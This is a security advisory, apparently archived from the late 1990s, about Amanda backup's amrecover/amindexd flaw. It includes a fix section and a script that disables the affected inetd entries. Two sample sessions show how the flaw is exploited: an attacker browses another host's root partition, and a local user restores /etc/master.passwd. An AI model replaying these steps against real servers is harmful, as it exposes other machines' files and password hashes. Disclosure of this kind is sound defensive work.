COMMAND

    Amanda

SYSTEMS AFFECTED

    Systems running Amanda backup software (2.3.0.x, 2.4.0beta)

PROBLEM

    The following information is based on CPIO Security Notice (issue
    number 11). There are several security problems in the current
    version of Amanda.

        1. Any attacker can remotely connect to an index server,
           allowing that person to access any machine being backed up.
        2. Any attacker with local access to a machine being backed up
           has access to any machine being backed up or any partition
           being backed up via Amanda.

    In example 1 the players are:

        index.servername.net | the affected index server
        remote.attacker.org  | attacker's computer
        staff                | a machine being backed up by the index server

        [remote%] amrecover -s index.servername.net
        AMRECOVER Version 1.0. Contacting server on index.servername.net ...
        220 index.servername.net AMANDA index server (1.0) ready.
        Setting restore date to today (1997-12-24)
        200 Working date set to 1997-12-24.
        200 Config set to DailySet1.
        501 No index records for host: remote.attacker.org. Invalid?
        amrecover> sethost staff
        200 Dump host set to staff.
        amrecover> setdisk wd0a
        200 Disk set to wd0a
        amrecover> ls
        [ list of root partition ]

    In example 2 the players are:

        users                | users' shell machine being backed up
        staff                | staff machine being backed up

        [users%] amrecover
        AMRECOVER Version 1.0. Contacting server on index.servername.net ...
        220 index.servername.net AMANDA index server (1.0) ready.
        Setting restore date to today (1997-12-24)
        200 Working date set to 1997-12-24.
        200 Config set to DailySet1.
        200 Dump host set to users.
        Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
        200 Disk set to wd0f.
        amrecover> setdisk wd0a
        200 Disk set to wd0a
        amrecover> cd etc
        amrecover> add master.passwd
        Added /etc/master.passwd
        amrecover> extract
        Extracting files using tape drive /dev/nrst0 on host index.servername.net.
        The following tapes are needed: DAILY6
        Restoring files into directory /home/home1/joey
        Continue? [Y/n]: y
        Load tape DAILY6 now
        Continue? [Y/n]: y
        amrecover> quit
        [local%] pwd
        /home/home1/joey
        [local%] ls master.passwd
        master.passwd

    This vulnerability was discovered and described by Joey Novell.

SOLUTION

    Amanda 2.4.0b5 fixes the amrecover problem and other potential
    security holes, and is the product of a security audit conducted
    in conjunction with the OpenBSD effort. The new version is
    available at:

        ftp://ftp.amanda.org/pub/amanda/amanda-2.4.0b5.tar.gz

    Amanda 2.3.0 and earlier UMD releases are not affected by this
    particular bug, as amrecover was not part of those releases.
    However, earlier releases do have potential security problems and
    other bugs, so the Amanda Team recommends upgrading to the new
    release as soon as practicable. At an active site running Amanda
    2.3.0.x or 2.4.0 beta, amrecover/amindexd can be disabled by:

        - removing amandaidx and amidxtape from /etc/inetd.conf
        - restarting inetd so that it rereads inetd.conf (kill -HUP
          should do)
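
    The two steps above can be checked mechanically. The script below is
    an added example, not part of the original notice or of Amanda: it
    lists active amandaidx/amidxtape entries in an inetd.conf and writes
    an edited copy with them commented out. The sample file, its paths
    and its user names are constructed for illustration.

```sh
#!/bin/sh
# Added example: find and disable the Amanda recover services in an inetd.conf.
# The service names are the advisory's; sample paths and users are constructed.
AMANDA_SVC='^(amandaidx|amidxtape)$'

# List active (uncommented) entries whose service-name field matches exactly.
active_amanda_entries() {
    awk -v svc="$AMANDA_SVC" '
        /^[ \t]*#/ { next }
        $1 ~ svc   { print FNR ": " $0 }
    ' "$1"
}

# Write a copy of the file ($1) to $2 with those entries commented out.
# Commenting a line out has the same effect on inetd as removing it.
disable_amanda_entries() {
    awk -v svc="$AMANDA_SVC" '
        !/^[ \t]*#/ && $1 ~ svc { print "#" $0; next }
        { print }
    ' "$1" > "$2"
}

# Constructed sample inetd.conf (not taken from a real host).
write_sample_conf() {
    cat > "$1" <<'EOF'
ftp       stream tcp nowait root   /usr/libexec/ftpd               ftpd -l
amanda    dgram  udp wait   amanda /usr/local/libexec/amandad      amandad
amandaidx stream tcp nowait amanda /usr/local/libexec/amindexd     amindexd
#amidxtape stream tcp nowait amanda /usr/local/libexec/amidxtaped  amidxtaped
amidxtape stream tcp nowait amanda /usr/local/libexec/amidxtaped   amidxtaped
EOF
}

# Demo: audit the sample, produce the edited copy, audit again.
demo_dir=$(mktemp -d)
write_sample_conf "$demo_dir/inetd.conf"
echo "active before:"; active_amanda_entries "$demo_dir/inetd.conf"
disable_amanda_entries "$demo_dir/inetd.conf" "$demo_dir/inetd.conf.new"
echo "active after: $(active_amanda_entries "$demo_dir/inetd.conf.new" | wc -l)"
rm -rf "$demo_dir"
```

    The match is anchored on the whole service-name field, so other
    entries in the file are left as they are. After reviewing and
    installing the edited copy, send inetd the HUP signal as described
    above.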